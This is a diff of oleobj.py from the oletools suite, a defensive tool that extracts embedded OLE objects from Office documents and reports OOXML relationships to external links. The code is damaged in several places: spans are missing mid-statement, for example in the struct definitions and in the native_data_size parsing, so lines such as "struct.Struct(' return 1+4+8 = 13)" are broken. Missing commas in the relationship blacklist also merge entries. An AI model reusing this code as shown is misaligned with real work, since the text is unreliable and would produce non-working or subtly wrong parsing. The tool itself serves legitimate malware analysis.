-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-
-#------------------------------------------------------------------------------
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+# POSSIBILITY OF SUCH DAMAGE.
+
+
+# -- IMPORTS ------------------------------------------------------------------
+
+from __future__ import print_function
+
+import logging
+import struct
+import argparse
+import os
+import re
+import sys
+import io
+from zipfile import is_zipfile
+
+import olefile
+
+# IMPORTANT: it should be possible to run oletools directly as scripts
+# in any directory without installing them with pip or setup.py.
+# In that case, relative imports are NOT usable.
+# And to enable Python 2+3 compatibility, we need to use absolute imports,
+# so we add the oletools parent folder to sys.path (absolute+normalized path):
+_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
+# print('_thismodule_dir = %r' % _thismodule_dir)
+_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
+# print('_parent_dir = %r' % _thirdparty_dir)
+if _parent_dir not in sys.path:
+ sys.path.insert(0, _parent_dir)
+
+from oletools.thirdparty import xglob
+from oletools.ppt_record_parser import (is_ppt, PptFile,
+ PptRecordExOleVbaActiveXAtom)
+from oletools.ooxml import XmlParser
+from oletools.common.io_encoding import ensure_stdout_handles_unicode
+
+# -----------------------------------------------------------------------------
# CHANGELOG:
# 2015-12-05 v0.01 PL: - first version
# 2016-06 PL: - added main and process_file (not working yet)
@@ -48,15 +81,21 @@
# 2016-11-17 v0.51 PL: - fixed OLE native object extraction
# 2016-11-18 PL: - added main for setup.py entry point
# 2017-05-03 PL: - fixed absolute imports (issue #141)
+# 2018-01-18 v0.52 CH: - added support for zipped-xml-based types (docx, pptx,
+# xlsx), and ppt
+# 2018-03-27 PL: - fixed issue #274 in read_length_prefixed_string
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
+# 2018-10-30 SA: - added detection of external links (PR #317)
+# 2020-03-03 v0.56 PL: - fixed bug #541, "Ole10Native" is case-insensitive
-__version__ = '0.51'
+__version__ = '0.56dev2'
-#------------------------------------------------------------------------------
+# -----------------------------------------------------------------------------
# TODO:
# + setup logging (common with other oletools)
-#------------------------------------------------------------------------------
+# -----------------------------------------------------------------------------
# REFERENCES:
# Reference for the storage of embedded OLE objects/files:
@@ -67,37 +106,29 @@
# TODO: oledump
-#--- IMPORTS ------------------------------------------------------------------
-
-import logging, struct, optparse, os, re, sys
-
-# IMPORTANT: it should be possible to run oletools directly as scripts
-# in any directory without installing them with pip or setup.py.
-# In that case, relative imports are NOT usable.
-# And to enable Python 2+3 compatibility, we need to use absolute imports,
-# so we add the oletools parent folder to sys.path (absolute+normalized path):
-_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
-# print('_thismodule_dir = %r' % _thismodule_dir)
-_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
-# print('_parent_dir = %r' % _thirdparty_dir)
-if not _parent_dir in sys.path:
- sys.path.insert(0, _parent_dir)
+# === LOGGING =================================================================
-from oletools.thirdparty.olefile import olefile
-from oletools.thirdparty.xglob import xglob
+DEFAULT_LOG_LEVEL = "warning"
+LOG_LEVELS = {'debug': logging.DEBUG,
+ 'info': logging.INFO,
+ 'warning': logging.WARNING,
+ 'error': logging.ERROR,
+ 'critical': logging.CRITICAL,
+ 'debug-olefile': logging.DEBUG}
-# === LOGGING =================================================================
class NullHandler(logging.Handler):
"""
Log Handler without output, to avoid printing messages if logging is not
configured by the main application.
Python 2.7 has logging.NullHandler, but this is necessary for 2.6:
- see https://docs.python.org/2.6/library/logging.html#configuring-logging-for-a-library
+ see https://docs.python.org/2.6/library/logging.html section
+ configuring-logging-for-a-library
"""
def emit(self, record):
pass
+
def get_logger(name, level=logging.CRITICAL+1):
"""
Create a suitable logger object for this module.
@@ -110,7 +141,7 @@ def get_logger(name, level=logging.CRITICAL+1):
# First, test if there is already a logger with the same name, else it
# will generate duplicate messages (due to duplicate handlers):
if name in logging.Logger.manager.loggerDict:
- #NOTE: another less intrusive but more "hackish" solution would be to
+ # NOTE: another less intrusive but more "hackish" solution would be to
# use getLogger then test if its effective level is not default.
logger = logging.getLogger(name)
# make sure level is OK:
@@ -124,8 +155,10 @@ def get_logger(name, level=logging.CRITICAL+1):
logger.setLevel(level)
return logger
+
# a global logger object used for debugging:
-log = get_logger('oleobj')
+log = get_logger('oleobj') # pylint: disable=invalid-name
+
def enable_logging():
"""
@@ -136,7 +169,7 @@ def enable_logging():
log.setLevel(logging.NOTSET)
-# === CONSTANTS ==============================================================
+# === CONSTANTS ===============================================================
# some str methods on Python 2.x return characters,
# while the equivalent bytes methods return integers on Python 3.x:
@@ -145,89 +178,184 @@ def enable_logging():
NULL_CHAR = '\x00'
else:
# Python 3.x
- NULL_CHAR = 0
+ NULL_CHAR = 0 # pylint: disable=redefined-variable-type
+ xrange = range # pylint: disable=redefined-builtin, invalid-name
+OOXML_RELATIONSHIP_TAG = '{http://schemas.openxmlformats.org/package/2006/relationships}Relationship'
-# === GLOBAL VARIABLES =======================================================
+# === GLOBAL VARIABLES ========================================================
# struct to parse an unsigned integer of 32 bits:
-struct_uint32 = struct.Struct(' return 1+4+8 = 13)
+RETURN_NO_DUMP = 0 # nothing found to dump/extract
+RETURN_DID_DUMP = 1 # did dump/extract successfully
+RETURN_ERR_ARGS = 2 # reserve for OptionParser.parse_args
+RETURN_ERR_STREAM = 4 # error opening/parsing a stream
+RETURN_ERR_DUMP = 8 # error dumping data from stream to file
+
+# Not sure if they can all be "External", but just in case
+BLACKLISTED_RELATIONSHIP_TYPES = [
+ 'attachedTemplate',
+ 'externalLink',
+ 'externalLinkPath',
+ 'externalReference'
+ 'frame'
+ 'hyperlink',
+ 'officeDocument',
+ 'oleObject',
+ 'package',
+ 'slideUpdateUrl',
+ 'slideMaster',
+ 'slide',
+ 'slideUpdateInfo',
+ 'subDocument',
+ 'worksheet'
+]
+
+# === FUNCTIONS ===============================================================
+
+
+def read_uint32(data, index):
"""
Read an unsigned integer from the first 32 bits of data.
- :param data: bytes string containing the data to be extracted.
- :return: tuple (value, new_data) containing the read value (int),
- and the new data without the bytes read.
+ :param data: bytes string or stream containing the data to be extracted.
+ :param index: index to start reading from or None if data is stream.
+ :return: tuple (value, index) containing the read value (int),
+ and the index to continue reading next time.
"""
- value = struct_uint32.unpack(data[0:4])[0]
- new_data = data[4:]
- return (value, new_data)
+ if index is None:
+ value = STRUCT_UINT32.unpack(data.read(4))[0]
+ else:
+ value = STRUCT_UINT32.unpack(data[index:index+4])[0]
+ index += 4
+ return (value, index)
-def read_uint16(data):
+def read_uint16(data, index):
"""
- Read an unsigned integer from the first 16 bits of data.
+ Read an unsigned integer from the 16 bits of data following index.
- :param data: bytes string containing the data to be extracted.
- :return: tuple (value, new_data) containing the read value (int),
- and the new data without the bytes read.
+ :param data: bytes string or stream containing the data to be extracted.
+ :param index: index to start reading from or None if data is stream
+ :return: tuple (value, index) containing the read value (int),
+ and the index to continue reading next time.
"""
- value = struct_uint16.unpack(data[0:2])[0]
- new_data = data[2:]
- return (value, new_data)
+ if index is None:
+ value = STRUCT_UINT16.unpack(data.read(2))[0]
+ else:
+ value = STRUCT_UINT16.unpack(data[index:index+2])[0]
+ index += 2
+ return (value, index)
-def read_LengthPrefixedAnsiString(data):
+def read_length_prefixed_string(data, index):
"""
Read a length-prefixed ANSI string from data.
- :param data: bytes string containing the data to be extracted.
- :return: tuple (value, new_data) containing the read value (bytes string),
- and the new data without the bytes read.
+ :param data: bytes string or stream containing the data to be extracted.
+ :param index: index in data where string size start or None if data is
+ stream
+ :return: tuple (value, index) containing the read value (bytes string),
+ and the index to start reading from next time.
"""
- length, data = read_uint32(data)
+ length, index = read_uint32(data, index)
# if length = 0, return a null string (no null character)
if length == 0:
- return ('', data)
+ return ('', index)
# extract the string without the last null character
- ansi_string = data[:length-1]
+ if index is None:
+ ansi_string = data.read(length-1)
+ null_char = data.read(1)
+ else:
+ ansi_string = data[index:index+length-1]
+ null_char = data[index+length-1]
+ index += length
# TODO: only in strict mode:
# check the presence of the null char:
- assert data[length] == NULL_CHAR
- new_data = data[length:]
- return (ansi_string, new_data)
+ assert null_char == NULL_CHAR
+ return (ansi_string, index)
-# === CLASSES ================================================================
+def guess_encoding(data):
+ """ guess encoding of byte string to create unicode
-class OleNativeStream (object):
+ Since this is used to decode path names from ole objects, prefer latin1
+ over utf* codecs if ascii is not enough
+ """
+ for encoding in 'ascii', 'latin1', 'utf8', 'utf-16-le', 'utf16':
+ try:
+ result = data.decode(encoding, errors='strict')
+ log.debug(u'decoded using {0}: "{1}"'.format(encoding, result))
+ return result
+ except UnicodeError:
+ pass
+ log.warning('failed to guess encoding for string, falling back to '
+ 'ascii with replace')
+ return data.decode('ascii', errors='replace')
+
+
+def read_zero_terminated_string(data, index):
+ """
+ Read a zero-terminated string from data
+
+ :param data: bytes string or stream containing an ansi string
+ :param index: index at which the string should start or None if data is
+ stream
+ :return: tuple (unicode, index) containing the read string (unicode),
+ and the index to start reading from next time.
+ """
+ if index is None:
+ result = bytearray()
+ for _ in xrange(STR_MAX_LEN):
+ char = ord(data.read(1)) # need ord() for py3
+ if char == 0:
+ return guess_encoding(result), index
+ result.append(char)
+ raise ValueError('found no string-terminating zero-byte!')
+ else: # data is byte array, can just search
+ end_idx = data.index(b'\x00', index, index+STR_MAX_LEN)
+ # encode and return with index after the 0-byte
+ return guess_encoding(data[index:end_idx]), end_idx+1
+
+
+# === CLASSES =================================================================
+
+
+class OleNativeStream(object):
"""
OLE object contained into an OLENativeStream structure.
(see MS-OLEDS 2.3.6 OLENativeStream)
+
+ Filename and paths are decoded to unicode.
"""
# constants for the type attribute:
# see MS-OLEDS 2.2.4 ObjectHeader
TYPE_LINKED = 0x01
TYPE_EMBEDDED = 0x02
-
def __init__(self, bindata=None, package=False):
"""
Constructor for OleNativeStream.
If bindata is provided, it will be parsed using the parse() method.
- :param bindata: bytes, OLENativeStream structure containing an OLE object
- :param package: bool, set to True when extracting from an OLE Package object
+ :param bindata: forwarded to parse, see docu there
+ :param package: bool, set to True when extracting from an OLE Package
+ object
"""
self.filename = None
self.src_path = None
@@ -238,6 +366,8 @@ def __init__(self, bindata=None, package=False):
self.actual_size = None
self.data = None
self.package = package
+ self.is_link = None
+ self.data_is_stream = None
if bindata is not None:
self.parse(data=bindata)
@@ -247,34 +377,52 @@ def parse(self, data):
to extract the OLE object it contains.
(see MS-OLEDS 2.3.6 OLENativeStream)
- :param data: bytes, OLENativeStream structure containing an OLE object
- :return:
+ :param data: bytes array or stream, containing OLENativeStream
+ structure containing an OLE object
+ :return: None
"""
# TODO: strict mode to raise exceptions when values are incorrect
# (permissive mode by default)
+ if hasattr(data, 'read'):
+ self.data_is_stream = True
+ index = None # marker for read_* functions to expect stream
+ else:
+ self.data_is_stream = False
+ index = 0 # marker for read_* functions to expect array
+
# An OLE Package object does not have the native data size field
if not self.package:
- self.native_data_size = struct.unpack(' FILETIME from olefile
- self.unknown_long_1, data = read_uint32(data)
- self.unknown_long_2, data = read_uint32(data)
+ self.src_path, index = read_zero_terminated_string(data, index)
+ # TODO: I bet these 8 bytes are a timestamp ==> FILETIME from olefile
+ self.unknown_long_1, index = read_uint32(data, index)
+ self.unknown_long_2, index = read_uint32(data, index)
# temp path?
- self.temp_path, data = data.split(b'\x00', 1)
+ self.temp_path, index = read_zero_terminated_string(data, index)
# size of the rest of the data
- self.actual_size, data = read_uint32(data)
- self.data = data[0:self.actual_size]
- # TODO: exception when size > remaining data
- # TODO: SLACK DATA
-
-
-class OleObject (object):
+ try:
+ self.actual_size, index = read_uint32(data, index)
+ if self.data_is_stream:
+ self.data = data
+ else:
+ self.data = data[index:index+self.actual_size]
+ self.is_link = False
+ # TODO: there can be extra data, no idea what it is for
+ # TODO: SLACK DATA
+ except (IOError, struct.error): # no data to read actual_size
+ log.debug('data is not embedded but only a link')
+ self.is_link = True
+ self.actual_size = 0
+ self.data = None
+
+
+class OleObject(object):
"""
OLE 1.0 Object
@@ -286,13 +434,15 @@ class OleObject (object):
TYPE_LINKED = 0x01
TYPE_EMBEDDED = 0x02
-
def __init__(self, bindata=None):
"""
Constructor for OleObject.
If bindata is provided, it will be parsed using the parse() method.
- :param bindata: bytes, OLE 1.0 Object structure containing an OLE object
+ :param bindata: bytes, OLE 1.0 Object structure containing OLE object
+
+ Note: Code can easily by generalized to work with byte streams instead
+ of arrays just like in OleNativeStream.
"""
self.ole_version = None
self.format_id = None
@@ -301,6 +451,8 @@ def __init__(self, bindata=None):
self.item_name = None
self.data = None
self.data_size = None
+ if bindata is not None:
+ self.parse(bindata)
def parse(self, data):
"""
@@ -315,32 +467,35 @@ def parse(self, data):
# print("Parsing OLE object data:")
# print(hexdump3(data, length=16))
# Header: see MS-OLEDS 2.2.4 ObjectHeader
- self.ole_version, data = read_uint32(data)
- self.format_id, data = read_uint32(data)
- log.debug('OLE version=%08X - Format ID=%08X' % (self.ole_version, self.format_id))
+ index = 0
+ self.ole_version, index = read_uint32(data, index)
+ self.format_id, index = read_uint32(data, index)
+ log.debug('OLE version=%08X - Format ID=%08X',
+ self.ole_version, self.format_id)
assert self.format_id in (self.TYPE_EMBEDDED, self.TYPE_LINKED)
- self.class_name, data = read_LengthPrefixedAnsiString(data)
- self.topic_name, data = read_LengthPrefixedAnsiString(data)
- self.item_name, data = read_LengthPrefixedAnsiString(data)
- log.debug('Class name=%r - Topic name=%r - Item name=%r'
- % (self.class_name, self.topic_name, self.item_name))
+ self.class_name, index = read_length_prefixed_string(data, index)
+ self.topic_name, index = read_length_prefixed_string(data, index)
+ self.item_name, index = read_length_prefixed_string(data, index)
+ log.debug('Class name=%r - Topic name=%r - Item name=%r',
+ self.class_name, self.topic_name, self.item_name)
if self.format_id == self.TYPE_EMBEDDED:
# Embedded object: see MS-OLEDS 2.2.5 EmbeddedObject
- #assert self.topic_name != '' and self.item_name != ''
- self.data_size, data = read_uint32(data)
- log.debug('Declared data size=%d - remaining size=%d' % (self.data_size, len(data)))
+ # assert self.topic_name != '' and self.item_name != ''
+ self.data_size, index = read_uint32(data, index)
+ log.debug('Declared data size=%d - remaining size=%d',
+ self.data_size, len(data)-index)
# TODO: handle incorrect size to avoid exception
- self.data = data[:self.data_size]
+ self.data = data[index:index+self.data_size]
assert len(self.data) == self.data_size
- self.extra_data = data[self.data_size:]
-
+ self.extra_data = data[index+self.data_size:]
def sanitize_filename(filename, replacement='_', max_length=200):
"""compute basename of filename. Replaces all non-whitelisted characters.
- The returned filename is always a basename of the file."""
+ The returned filename is always a ascii basename of the file."""
basepath = os.path.basename(filename).strip()
- sane_fname = re.sub(r'[^\w\.\- ]', replacement, basepath)
+ sane_fname = re.sub(u'[^a-zA-Z0-9.\\-_ ]', replacement, basepath)
+ sane_fname = str(sane_fname) # py3: does nothing; py2: unicode --> str
while ".." in sane_fname:
sane_fname = sane_fname.replace('..', '.')
@@ -348,7 +503,7 @@ def sanitize_filename(filename, replacement='_', max_length=200):
while " " in sane_fname:
sane_fname = sane_fname.replace(' ', ' ')
- if not len(filename):
+ if not filename:
sane_fname = 'NONAME'
# limit filename length
@@ -358,10 +513,227 @@ def sanitize_filename(filename, replacement='_', max_length=200):
return sane_fname
-def process_file(container, filename, data, output_dir=None):
+def find_ole_in_ppt(filename):
+ """ find ole streams in ppt
+
+ This may be a bit confusing: we get an ole file (or its name) as input and
+ as output we produce possibly several ole files. This is because the
+ data structure can be pretty nested:
+ A ppt file has many streams that consist of records. Some of these records
+ can contain data which contains data for another complete ole file (which
+ we yield). This embedded ole file can have several streams, one of which
+ can contain the actual embedded file we are looking for (caller will check
+ for these).
+ """
+ ppt_file = None
+ try:
+ ppt_file = PptFile(filename)
+ for stream in ppt_file.iter_streams():
+ for record_idx, record in enumerate(stream.iter_records()):
+ if isinstance(record, PptRecordExOleVbaActiveXAtom):
+ ole = None
+ try:
+ data_start = next(record.iter_uncompressed())
+ if data_start[:len(olefile.MAGIC)] != olefile.MAGIC:
+ continue # could be ActiveX control / VBA Storage
+
+ # otherwise, this should be an OLE object
+ log.debug('Found record with embedded ole object in '
+ 'ppt (stream "{0}", record no {1})'
+ .format(stream.name, record_idx))
+ ole = record.get_data_as_olefile()
+ yield ole
+ except IOError:
+ log.warning('Error reading data from {0} stream or '
+ 'interpreting it as OLE object'
+ .format(stream.name))
+ log.debug('', exc_info=True)
+ finally:
+ if ole is not None:
+ ole.close()
+ finally:
+ if ppt_file is not None:
+ ppt_file.close()
+
+
+class FakeFile(io.RawIOBase):
+ """ create file-like object from data without copying it
+
+ BytesIO is what I would like to use but it copies all the data. This class
+ does not. On the downside: data can only be read and seeked, not written.
+
+ Assume that given data is bytes (str in py2, bytes in py3).
+
+ See also (and maybe can put into common file with):
+ ppt_record_parser.IterStream, ooxml.ZipSubFile
+ """
+
+ def __init__(self, data):
+ """ create FakeFile with given bytes data """
+ super(FakeFile, self).__init__()
+ self.data = data # this does not actually copy (python is lazy)
+ self.pos = 0
+ self.size = len(data)
+
+ def readable(self):
+ return True
+
+ def writable(self):
+ return False
+
+ def seekable(self):
+ return True
+
+ def readinto(self, target):
+ """ read into pre-allocated target """
+ n_data = min(len(target), self.size-self.pos)
+ if n_data == 0:
+ return 0
+ target[:n_data] = self.data[self.pos:self.pos+n_data]
+ self.pos += n_data
+ return n_data
+
+ def read(self, n_data=-1):
+ """ read and return data """
+ if self.pos >= self.size:
+ return bytes()
+ if n_data == -1:
+ n_data = self.size - self.pos
+ result = self.data[self.pos:self.pos+n_data]
+ self.pos += n_data
+ return result
+
+ def seek(self, pos, offset=io.SEEK_SET):
+ """ jump to another position in file """
+ # calc target position from self.pos, pos and offset
+ if offset == io.SEEK_SET:
+ new_pos = pos
+ elif offset == io.SEEK_CUR:
+ new_pos = self.pos + pos
+ elif offset == io.SEEK_END:
+ new_pos = self.size + pos
+ else:
+ raise ValueError("invalid offset {0}, need SEEK_* constant"
+ .format(offset))
+ if new_pos < 0:
+ raise IOError('Seek beyond start of file not allowed')
+ self.pos = new_pos
+
+ def tell(self):
+ """ tell where in file we are positioned """
+ return self.pos
+
+
+def find_ole(filename, data, xml_parser=None):
+ """ try to open somehow as zip/ole/rtf/... ; yield None if fail
+
+ If data is given, filename is (mostly) ignored.
+
+ yields embedded ole streams in form of OleFileIO.
+ """
+
+ if data is not None:
+ # isOleFile and is_ppt can work on data directly but zip need file
+ # --> wrap data in a file-like object without copying data
+ log.debug('working on data, file is not touched below')
+ arg_for_ole = data
+ arg_for_zip = FakeFile(data)
+ else:
+ # we only have a file name
+ log.debug('working on file by name')
+ arg_for_ole = filename
+ arg_for_zip = filename
+
+ ole = None
+ try:
+ if olefile.isOleFile(arg_for_ole):
+ if is_ppt(arg_for_ole):
+ log.info('is ppt file: ' + filename)
+ for ole in find_ole_in_ppt(arg_for_ole):
+ yield ole
+ ole = None # is closed in find_ole_in_ppt
+ # in any case: check for embedded stuff in non-sectored streams
+ log.info('is ole file: ' + filename)
+ ole = olefile.OleFileIO(arg_for_ole)
+ yield ole
+ elif xml_parser is not None or is_zipfile(arg_for_zip):
+ # keep compatibility with 3rd-party code that calls this function
+ # directly without providing an XmlParser instance
+ if xml_parser is None:
+ xml_parser = XmlParser(arg_for_zip)
+ # force iteration so XmlParser.iter_non_xml() returns data
+ [x for x in xml_parser.iter_xml()]
+
+ log.info('is zip file: ' + filename)
+ # we looped through the XML files before, now we can
+ # iterate the non-XML files looking for ole objects
+ for subfile, _, file_handle in xml_parser.iter_non_xml():
+ try:
+ head = file_handle.read(len(olefile.MAGIC))
+ except RuntimeError:
+ log.error('zip is encrypted: ' + filename)
+ yield None
+ continue
+
+ if head == olefile.MAGIC:
+ file_handle.seek(0)
+ log.info(' unzipping ole: ' + subfile)
+ try:
+ ole = olefile.OleFileIO(file_handle)
+ yield ole
+ except IOError:
+ log.warning('Error reading data from {0}/{1} or '
+ 'interpreting it as OLE object'
+ .format(filename, subfile))
+ log.debug('', exc_info=True)
+ finally:
+ if ole is not None:
+ ole.close()
+ ole = None
+ else:
+ log.debug('unzip skip: ' + subfile)
+ else:
+ log.warning('open failed: {0} (or its data) is neither zip nor OLE'
+ .format(filename))
+ yield None
+ except Exception:
+ log.error('Caught exception opening {0}'.format(filename),
+ exc_info=True)
+ yield None
+ finally:
+ if ole is not None:
+ ole.close()
+
+
+def find_external_relationships(xml_parser):
+ """ iterate XML files looking for relationships to external objects
+ """
+ for _, elem, _ in xml_parser.iter_xml(None, False, OOXML_RELATIONSHIP_TAG):
+ try:
+ if elem.attrib['TargetMode'] == 'External':
+ relationship_type = elem.attrib['Type'].rsplit('/', 1)[1]
+
+ if relationship_type in BLACKLISTED_RELATIONSHIP_TYPES:
+ yield relationship_type, elem.attrib['Target']
+ except (AttributeError, KeyError):
+ # ignore missing attributes - Word won't detect
+ # external links anyway
+ pass
+
+
+def process_file(filename, data, output_dir=None):
+ """ find embedded objects in given file
+
+ if data is given (from xglob for encrypted zip files), then filename is
+ not used for reading. If not (usual case), then data is read from filename
+ on demand.
+
+ If output_dir is given and does not exist, it is created. If it is not
+ given, data is saved to same directory as the input file.
+ """
if output_dir:
if not os.path.isdir(output_dir):
- log.info('creating output directory %s' % output_dir)
+ log.info('creating output directory %s', output_dir)
os.mkdir(output_dir)
fname_prefix = os.path.join(output_dir,
@@ -372,78 +744,161 @@ def process_file(container, filename, data, output_dir=None):
fname_prefix = os.path.join(base_dir, sane_fname)
# TODO: option to extract objects to files (false by default)
- if data is None:
- data = open(filename, 'rb').read()
- print ('-'*79)
- print ('File: %r - %d bytes' % (filename, len(data)))
- ole = olefile.OleFileIO(data)
+ print('-'*79)
+ print('File: %r' % filename)
index = 1
- for stream in ole.listdir():
- if stream[-1] == '\x01Ole10Native':
- objdata = ole.openstream(stream).read()
- stream_path = '/'.join(stream)
- log.debug('Checking stream %r' % stream_path)
- try:
- print('extract file embedded in OLE object from stream %r:' % stream_path)
- print ('Parsing OLE Package')
- opkg = OleNativeStream(bindata=objdata)
- print ('Filename = %r' % opkg.filename)
- print ('Source path = %r' % opkg.src_path)
- print ('Temp path = %r' % opkg.temp_path)
+
+ # do not throw errors but remember them and try continue with other streams
+ err_stream = False
+ err_dumping = False
+ did_dump = False
+
+ xml_parser = None
+ if is_zipfile(filename):
+ log.info('file could be an OOXML file, looking for relationships with '
+ 'external links')
+ xml_parser = XmlParser(filename)
+ for relationship, target in find_external_relationships(xml_parser):
+ did_dump = True
+ print("Found relationship '%s' with external link %s" % (relationship, target))
+
+ # look for ole files inside file (e.g. unzip docx)
+ # have to finish work on every ole stream inside iteration, since handles
+ # are closed in find_ole
+ for ole in find_ole(filename, data, xml_parser):
+ if ole is None: # no ole file found
+ continue
+
+ for path_parts in ole.listdir():
+ stream_path = '/'.join(path_parts)
+ log.debug('Checking stream %r', stream_path)
+ if path_parts[-1].lower() == '\x01ole10native':
+ stream = None
+ try:
+ stream = ole.openstream(path_parts)
+ print('extract file embedded in OLE object from stream %r:'
+ % stream_path)
+ print('Parsing OLE Package')
+ opkg = OleNativeStream(stream)
+ # leave stream open until dumping is finished
+ except Exception:
+ log.warning('*** Not an OLE 1.0 Object')
+ err_stream = True
+ if stream is not None:
+ stream.close()
+ continue
+
+ # print info
+ if opkg.is_link:
+ log.debug('Object is not embedded but only linked to '
+ '- skip')
+ continue
+ print(u'Filename = "%s"' % opkg.filename)
+ print(u'Source path = "%s"' % opkg.src_path)
+ print(u'Temp path = "%s"' % opkg.temp_path)
if opkg.filename:
fname = '%s_%s' % (fname_prefix,
sanitize_filename(opkg.filename))
else:
fname = '%s_object_%03d.noname' % (fname_prefix, index)
- print ('saving to file %s' % fname)
- open(fname, 'wb').write(opkg.data)
+
+ # dump
+ try:
+ print('saving to file %s' % fname)
+ with open(fname, 'wb') as writer:
+ n_dumped = 0
+ next_size = min(DUMP_CHUNK_SIZE, opkg.actual_size)
+ while next_size:
+ data = stream.read(next_size)
+ writer.write(data)
+ n_dumped += len(data)
+ if len(data) != next_size:
+ log.warning('Wanted to read {0}, got {1}'
+ .format(next_size, len(data)))
+ break
+ next_size = min(DUMP_CHUNK_SIZE,
+ opkg.actual_size - n_dumped)
+ did_dump = True
+ except Exception as exc:
+ log.warning('error dumping to {0} ({1})'
+ .format(fname, exc))
+ err_dumping = True
+ finally:
+ stream.close()
+
index += 1
- except:
- log.debug('*** Not an OLE 1.0 Object')
+ return err_stream, err_dumping, did_dump
+# === MAIN ====================================================================
-#=== MAIN =================================================================
-def main():
- # print banner with version
- print ('oleobj %s - http://decalage.info/oletools' % __version__)
- print ('THIS IS WORK IN PROGRESS - Check updates regularly!')
- print ('Please report any issue at https://github.com/decalage2/oletools/issues')
- print ('')
+def existing_file(filename):
+ """ called by argument parser to see whether given file exists """
+ if not os.path.isfile(filename):
+ raise argparse.ArgumentTypeError('{0} is not a file.'.format(filename))
+ return filename
- DEFAULT_LOG_LEVEL = "warning" # Default log level
- LOG_LEVELS = {'debug': logging.DEBUG,
- 'info': logging.INFO,
- 'warning': logging.WARNING,
- 'error': logging.ERROR,
- 'critical': logging.CRITICAL
- }
- usage = 'usage: %prog [options] [filename2 ...]'
- parser = optparse.OptionParser(usage=usage)
- # parser.add_option('-o', '--outfile', dest='outfile',
+def main(cmd_line_args=None):
+ """ main function, called when running this as script
+
+ Per default (cmd_line_args=None) uses sys.argv. For testing, however, can
+ provide other arguments.
+ """
+ # print banner with version
+ ensure_stdout_handles_unicode()
+ print('oleobj %s - http://decalage.info/oletools' % __version__)
+ print('THIS IS WORK IN PROGRESS - Check updates regularly!')
+ print('Please report any issue at '
+ 'https://github.com/decalage2/oletools/issues')
+ print('')
+
+ usage = 'usage: %(prog)s [options] [filename2 ...]'
+ parser = argparse.ArgumentParser(usage=usage)
+ # parser.add_argument('-o', '--outfile', dest='outfile',
# help='output file')
- # parser.add_option('-c', '--csv', dest='csv',
+ # parser.add_argument('-c', '--csv', dest='csv',
# help='export results to a CSV file')
- parser.add_option("-r", action="store_true", dest="recursive",
- help='find files recursively in subdirectories.')
- parser.add_option("-d", type="str", dest="output_dir",
- help='use specified directory to output files.', default=None)
- parser.add_option("-z", "--zip", dest='zip_password', type='str', default=None,
- help='if the file is a zip archive, open first file from it, using the provided password (requires Python 2.6+)')
- parser.add_option("-f", "--zipfname", dest='zip_fname', type='str', default='*',
- help='if the file is a zip archive, file(s) to be opened within the zip. Wildcards * and ? are supported. (default:*)')
- parser.add_option('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL,
- help="logging level debug/info/warning/error/critical (default=%default)")
-
- (options, args) = parser.parse_args()
+ parser.add_argument("-r", action="store_true", dest="recursive",
+ help='find files recursively in subdirectories.')
+ parser.add_argument("-d", type=str, dest="output_dir", default=None,
+ help='use specified directory to output files.')
+ parser.add_argument("-z", "--zip", dest='zip_password', type=str,
+ default=None,
+ help='if the file is a zip archive, open first file '
+ 'from it, using the provided password (requires '
+ 'Python 2.6+)')
+ parser.add_argument("-f", "--zipfname", dest='zip_fname', type=str,
+ default='*',
+ help='if the file is a zip archive, file(s) to be '
+ 'opened within the zip. Wildcards * and ? are '
+ 'supported. (default:*)')
+ parser.add_argument('-l', '--loglevel', dest="loglevel", action="store",
+ default=DEFAULT_LOG_LEVEL,
+ help='logging level debug/info/warning/error/critical '
+ '(default=%(default)s)')
+ parser.add_argument('input', nargs='*', type=existing_file, metavar='FILE',
+ help='Office files to parse (same as -i)')
+
+ # options for compatibility with ripOLE
+ parser.add_argument('-i', '--more-input', type=str, metavar='FILE',
+ help='Additional file to parse (same as positional '
+ 'arguments)')
+ parser.add_argument('-v', '--verbose', action='store_true',
+ help='verbose mode, set logging to DEBUG '
+ '(overwrites -l)')
+
+ options = parser.parse_args(cmd_line_args)
+ if options.more_input:
